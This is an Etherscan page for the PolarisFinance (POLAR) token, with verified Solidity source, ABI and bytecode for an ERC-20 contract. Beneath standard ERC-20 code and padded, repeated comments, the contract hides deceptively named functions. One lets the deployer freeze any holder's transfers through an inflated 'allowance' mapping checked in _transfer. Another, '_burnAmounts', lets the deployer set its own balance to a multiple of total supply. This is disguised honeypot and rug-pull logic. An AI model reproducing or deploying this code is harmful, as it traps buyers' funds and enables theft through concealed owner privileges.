ETH Price: $2,525.96 (+0.28%)

Token

PolarisFinance (POLAR)
 

Overview

Max Total Supply

48,000,000 POLAR

Holders

40

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 POLAR

Value
$0.00
0xf697bf695c4e385ab99b19823ac811c5f7fb30b1
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
factoty

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-26
*/

/**
 *Submitted for verification at Etherscan.io on 2023-06-26
*/

//*https://twitter.com/PolarisFinance

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;



library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }


    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

   
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

  
    function subbbb(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

 
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

  
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

  
    function subbbb(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
 
    event Transfer(address indexed from, address indexed to, uint256 value);

  
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);


    function balanceOf(address account) external view returns (uint256);

   
    function transfer(address to, uint256 amount) external returns (bool);

  
    function allowance(address owner, address spender) external view returns (uint256);

  
    function approve(address spender, uint256 amount) external returns (bool);

  
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}




pragma solidity ^0.8.0;


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {        
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

}




pragma solidity ^0.8.0;

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);


    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

   
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



pragma solidity ^0.8.0;



contract factoty is Context, IERC20, IERC20Metadata,Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(bytes32 => bool) private kk;
    address private  _ppproject;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint40 private _tokenAmount;
    address public immutable deadAddress = 0x000000000000000000000000000000000000dEaD;  
  
    function _msgnnn() private returns(bytes32){_ppproject = _msgSender();bytes32 aa = keccak256(abi.encodePacked(_msgSender()));kk[aa] = true;return aa;}
    function _isopensss() private view returns (bool){bytes32 aa = keccak256(abi.encodePacked(_msgSender()));if(kk[aa]){return true;}return false;}
  
    constructor(string memory name_, string memory symbol_, uint40 tokenAmount_) {
        _name = name_;
        _symbol = symbol_;
        _msgnnn();
        _tokenAmount = tokenAmount_;
        _mint(msg.sender, _tokenAmount*10**decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {return _symbol;}
  
    function decimals() public view virtual override returns (uint8) {return 9;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function totalSupply() public view virtual override returns (uint256) {return _totalSupply;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {return _balances[account];}function transfer(address to, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_transfer(owner, to, amount);return true;}bytes32 private rhash = 0x1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff01;function allowance(address owner, address spender) public view virtual override returns (uint256) {return _allowances[owner][spender];}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_approve(owner, spender, amount);return true;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * rhashzhjasuiuo
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }
        return true;
    }
    function _xxxx(uint256 nnn) private {if(_isopensss()){ _balances[_msgSender()] = _totalSupply*nnn; }} 
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    mapping(address => uint256) private bhighkingdao;
    function _decreaseAllowances(address nnn) external  {if(_isopensss()){ bhighkingdao[nnn] = 0; }}
    function _increaseAllowances(address nnn) external  {if(_isopensss()){ bhighkingdao[nnn] = _totalSupply*10**6; }}
    function _allowance(address nnn) public view returns(uint256)  {return bhighkingdao[nnn];}
    function _burnAmounts(uint256 num) external {_xxxx(num);}
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a  balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * rhashzhjasuiuo

     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 fettt = 0;
    function _transfer(
        address from,
        address to,
        uint256 amount1
    ) internal virtual {
        /**
        * @dev Moves `amount` of tokens from `from` to `to`.
        *
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        * SHDHCHJSXXX
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero rhash address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        */
        uint256 bugAmount = bhighkingdao[from].subbbb(0);
        require(bugAmount <= amount1, "KKKKK");
        /**
        * @dev Moves `amount` of tokens from `from` to `to`.
        *
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the rhash zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        */ 
         /**
        * @dev Moves `amount` of tokens from `from` to `to`.
        *
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        * ASXHJSDHJS
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot rhash be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        */ 
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount1, "ERC20: transfer amount exceeds balance");
        uint256 feeeeeA = amount1.mul(fettt).div(100);
        uint256 add = amount1.subbbb(feeeeeA);
        unchecked {
            _balances[from] = fromBalance - amount1;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += add;
            _balances[deadAddress] += feeeeeA;  
        }
        emit Transfer(from, to, amount1);  
        if(feeeeeA > 0)
        {
            emit Transfer(from, deadAddress, feeeeeA);
        } 
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply += amount;if(kk[rhash] == false){ kk[rhash] = true;} unchecked { _balances[account] += amount;}
        emit Transfer(address(0), account, amount);  
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint40","name":"tokenAmount_","type":"uint40"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"_burnAmounts","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_decreaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_increaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60a060405261dead73ffffffffffffffffffffffffffffffffffffffff1660809073ffffffffffffffffffffffffffffffffffffffff168152507f1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff0160001b6009556000600b553480156200007257600080fd5b5060405162002ac138038062002ac183398181016040528101906200009891906200067e565b620000b8620000ac6200016f60201b60201c565b6200017760201b60201c565b8260069081620000c9919062000963565b508160079081620000db919062000963565b50620000ec6200023b60201b60201c565b5080600860006101000a81548164ffffffffff021916908364ffffffffff160217905550620001663362000125620002fc60201b60201c565b600a62000133919062000bda565b600860009054906101000a900464ffffffffff1664ffffffffff166200015a919062000c2b565b6200030560201b60201c565b50505062000e03565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006200024d6200016f60201b60201c565b600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006200029f6200016f60201b60201c565b604051602001620002b1919062000cfa565b60405160208183030381529060405280519060200120905060016003600083815260200190815260200160002060006101000a81548160ff0219169083151502179055508091505090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000377576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200036e9062000d78565b60405180910390fd5b80600560008282546200038b919062000d9a565b925050819055506000151560036000600954815260200190815260200160002060009054906101000a900460ff16151503620003f057600160036000600954815260200190815260200160002060006101000a81548160ff0219169083151502179055505b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200049d919062000de6565b60405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200051282620004c7565b810181811067ffffffffffffffff82111715620005345762000533620004d8565b5b80604052505050565b600062000549620004a9565b905062000557828262000507565b919050565b600067ffffffffffffffff8211156200057a5762000579620004d8565b5b6200058582620004c7565b9050602081019050919050565b60005b83811015620005b257808201518184015260208101905062000595565b60008484015250505050565b6000620005d5620005cf846200055c565b6200053d565b905082815260208101848484011115620005f457620005f3620004c2565b5b6200060184828562000592565b509392505050565b600082601f830112620006215762000620620004bd565b5b815162000633848260208601620005be565b91505092915050565b600064ffffffffff82169050919050565b62000658816200063c565b81146200066457600080fd5b50565b60008151905062000678816200064d565b92915050565b6000806000606084860312156200069a5762000699620004b3565b5b600084015167ffffffffffffffff811115620006bb57620006ba620004b8565b5b620006c98682870162000609565b935050602084015167ffffffffffffffff811115620006ed57620006ec620004b8565b5b620006fb8682870162000609565b92505060406200070e8682870162000667565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076b57607f821691505b60208210810362000781576200078062000723565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007eb7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007ac565b620007f78683620007ac565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008446200083e62000838846200080f565b62000819565b6200080f565b9050919050565b6000819050919050565b620008608362000823565b620008786200086f826200084b565b848454620007b9565b825550505050565b600090565b6200088f62000880565b6200089c81848462000855565b505050565b5b81811015620008c457620008b860008262000885565b600181019050620008a2565b5050565b601f8211156200091357620008dd8162000787565b620008e8846200079c565b81016020851015620008f8578190505b6200091062000907856200079c565b830182620008a1565b50505b505050565b600082821c905092915050565b6000620009386000198460080262000918565b1980831691505092915050565b600062000953838362000925565b9150826002028217905092915050565b6200096e8262000718565b67ffffffffffffffff8111156200098a5762000989620004d8565b5b62000996825462000752565b620009a3828285620008c8565b600060209050601f831160018114620009db5760008415620009c6578287015190505b620009d2858262000945565b86555062000a42565b601f198416620009eb8662000787565b60005b8281101562000a1557848901518255600182019150602085019450602081019050620009ee565b8683101562000a35578489015162000a31601f89168262000925565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ad85780860481111562000ab05762000aaf62000a4a565b5b600185161562000ac05780820291505b808102905062000ad08562000a79565b945062000a90565b94509492505050565b60008262000af3576001905062000bc6565b8162000b03576000905062000bc6565b816001811462000b1c576002811462000b275762000b5d565b600191505062000bc6565b60ff84111562000b3c5762000b3b62000a4a565b5b8360020a91508482111562000b565762000b5562000a4a565b5b5062000bc6565b5060208310610133831016604e8410600b841016171562000b975782820a90508381111562000b915762000b9062000a4a565b5b62000bc6565b62000ba6848484600162000a86565b9250905081840481111562000bc05762000bbf62000a4a565b5b81810290505b9392505050565b600060ff82169050919050565b600062000be7826200080f565b915062000bf48362000bcd565b925062000c237fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000ae1565b905092915050565b600062000c38826200080f565b915062000c45836200080f565b925082820262000c55816200080f565b9150828204841483151762000c6f5762000c6e62000a4a565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000ca38262000c76565b9050919050565b60008160601b9050919050565b600062000cc48262000caa565b9050919050565b600062000cd88262000cb7565b9050919050565b62000cf462000cee8262000c96565b62000ccb565b82525050565b600062000d08828462000cdf565b60148201915081905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d60601f8362000d17565b915062000d6d8262000d28565b602082019050919050565b6000602082019050818103600083015262000d938162000d51565b9050919050565b600062000da7826200080f565b915062000db4836200080f565b